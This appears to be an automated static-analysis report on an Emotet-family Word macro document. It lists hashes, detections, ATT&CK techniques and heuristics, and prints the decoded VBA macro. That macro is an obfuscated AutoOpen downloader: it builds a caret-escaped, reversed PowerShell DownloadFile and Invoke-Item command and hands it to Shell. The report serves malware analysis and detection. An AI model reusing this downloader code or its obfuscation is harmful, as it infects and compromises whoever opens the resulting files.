Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 41381d1be6edc5b4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 93.6 KB
Created: 2018-09-21 14:37:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 0016632d5787d3aafcd96a3765f2f209
SHA-1: ee427446c4e6b564ed76d9b6d1fd9189b2e9c21a
SHA-256: 41381d1be6edc5b46bc2aa5dcf06bbb5b0557ba81d821d23eb69f87660c0dbc1
Risk score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6826430-0', indicating a downloader for the Emotet family. The presence of a VBA macro with an 'AutoOpen' subroutine, which is a common execution vector, further supports this. The macro uses the Shell function to execute a command, likely downloading and running a secondary payload.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6826430-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826430-0
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen subroutine, which runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12532 bytes
SHA-256: bef3386ad096127f711363ce787e007b8eb1617cf39dad6b0693d1bf3f3f6c09

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iizjCRDRuNsVA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim MHFnZ(2)
MHFnZ(0) = Left("wZfvzKsw", 484)
MHFnZ(1) = Mid("Dboiscm", 481, 162)

   Dim IAHmvO(2)
IAHmvO(0) = MidB("cUPIQi", 996, 290)
IAHmvO(1) = Right("uufbE", 228)

   Dim TjjXN(1)
TjjXN(0) = MidB("EzNaa", 820, 569)

   Dim jUaok(1)
jUaok(0) = Mid("cjHCivEw", 444, 128)

   Dim jlwKh(1)
jlwKh(0) = Mid("UsvSOL", 697, 399)

   Dim vwXZi(1)
vwXZi(0) = Mid("zTSvv", 551, 813)

   Dim zciihY(2)
zciihY(0) = MidB("frzFRI", 620, 219)
zciihY(1) = Left("hPGnLRoz", 516)

dMNdIZlc (KeyString(6 + 3 + 9 + 11 + 38) + XzuRhrw + IlCbz + zAnMa + XKWczi + QpOzmQzA + fIMRSkQDkPHW)
   Dim hXVMz(2)
hXVMz(0) = Left("LuktwQMi", 565)
hXVMz(1) = Left("MuBQB", 199)

   Dim OsTjo(2)
OsTjo(0) = Left("DbwSPCi", 122)
OsTjo(1) = MidB("rjKjAkz", 516, 889)

   Dim jwqcjQ(1)
jwqcjQ(0) = Right("ZhkAfG", 689)

End Sub
Function dMNdIZlc(pEEQlpihAs As String)
   Dim Xjcizz(2)
Xjcizz(0) = MidB("bjaNomz", 276, 954)
Xjcizz(1) = Mid("FCiljzhd", 631, 577)

   Dim nVlvSw(2)
nVlvSw(0) = MidB("Xhljs", 657, 46)
nVlvSw(1) = Left("zcjDDi", 211)

Shell@ pEEQlpihAs, CInt(msoBarTypeNormal)
   Dim vUzmKD(2)
vUzmKD(0) = MidB("ULShzbW", 179, 318)
vUzmKD(1) = Right("uwoDvjE", 726)

   Dim MiRFOd(1)
MiRFOd(0) = MidB("pqqku", 18, 321)

   Dim HcBJX(1)
HcBJX(0) = Right("WXZjJFM", 149)

   Dim LNTkn(1)
LNTkn(0) = Mid("ZfbRfSU", 609, 393)

End Function

Attribute VB_Name = "wpULVtBFvTmAKp"
Function XzuRhrw()
Dim vQKEwr(1)
vQKEwr(0) = MidB("dDmSkhE", 421, 648)

   Dim zqSdz(1)
zqSdz(0) = Right("pTCJz", 633)

   Dim waAsXO(2)
waAsXO(0) = Mid("tiuzhJ", 918, 331)
waAsXO(1) = MidB("CSAaiR", 478, 701)

nJKthBOC = "m" + "d /V" + "^:^" + "O/C" + ChrW(5 + 2 + 1 + 1 + 25) + "^s"
Dim aTAjiw(2)
aTAjiw(0) = Mid("vfsfA", 341, 704)
aTAjiw(1) = Left("EwYAkYdR", 323)

NahjjA = "^e" + "t" + " L" + "^6c^" + "f" + "= ^ " + "^ ^ " + "^ "
Dim lUIXjG(1)
lUIXjG(0) = Mid("CIAiF", 936, 39)

   Dim ORTSBV(1)
ORTSBV(0) = MidB("zLdLizJY", 871, 549)

   Dim ocdWkC(1)
ocdWkC(0) = MidB("HkVwO", 542, 830)

   Dim wtrviW(2)
wtrviW(0) = Mid("OjXBKil", 333, 998)
wtrviW(1) = Left("XclQZ", 201)

YRsBNrjwjw = "^  ^" + " ^" + "   " + " ^ " + " ^  "
Dim HKZJTc(2)
HKZJTc(0) = Right("jJNWzFQW", 679)
HKZJTc(1) = Right("pnAWPGm", 468)

   Dim WEwclc(1)
WEwclc(0) = Left("VnnXW", 719)

HZhoib = "^ }}" + "{^hc" + "t^ac" + "^" + "}" + "^;k^"
Dim sEnlP(1)
sEnlP(0) = MidB("wCjZkT", 888, 141)

   Dim dcnljL(2)
dcnljL(0) = MidB("OkCmS", 495, 464)
dcnljL(1) = MidB("OPdAFQEs", 638, 967)

mjLkUjwL = "ae" + "r" + "b" + "^;^" + "m" + "G" + "J"
Dim ofJGw(1)
ofJGw(0) = Right("FQiiV", 112)

   Dim QqLIQ(1)
QqLIQ(0) = Mid("wTwinqw", 38, 202)

   Dim DUawZr(2)
DUawZr(0) = MidB("vDHhZk", 128, 760)
DUawZr(1) = Left("GQKwRXD", 531)

   Dim wdRDr(1)
wdRDr(0) = Left("wIYUUcJ", 303)

OCVRJjqSSVX = "$^ " + "^m^e" + "t^" + "I^" + "-" + "ekov" + "nI;)" + "m^G" + "J" + "^$" + "^ " + "^,q^" + "PD^"
Dim OzsJc(2)
OzsJc(0) = MidB("nSmszWjU", 410, 760)
OzsJc(1) = MidB("FhIJdBL", 322, 273)

   Dim tYzpGW(1)
tYzpGW(0) = MidB("vTijivJh", 299, 297)

   Dim fbLvLr(2)
fbLvLr(0) = MidB("VibTH", 251, 68)
fbLvLr(1) = Right("wNWcA", 174)

   Dim isirv(2)
isirv(0) = Left("RvlwhsO", 245)
isirv(1) = MidB("ZNuHPMXZ", 393, 43)

SIBsWiuAAfL = "$(^e" + "li^F" + "daol" + "n" + "wo^D" + "." + "v" + "^a" + "N$^{" + "yr"
Dim HSOpZ(1)
HSOpZ(0) = MidB("EuoMlJ", 438, 248)

   Dim hstbl(2)
hstbl(0) = Mid("biLAk", 154, 312)
hstbl(1) = Left("QoRhskw", 828)

   Dim DSpQE(1)
DSpQE(0) = Mid("ForhiBfr", 894, 817)

   Dim Awlvj(2)
Awlvj(0) = Mid("zDKjCOob", 224, 952)
Awlvj(1) = Right("qVSEkTU", 144)

   Dim jjWkAh(2)
jjWkAh(0) = Left("FQVmcNqY", 913)
jjWkAh(1) = Mid("fdZowiMw", 944, 829)

zwVAkKz = "^" + "t" + "^{)^" + "T^p" + "M$^" 
... (truncated)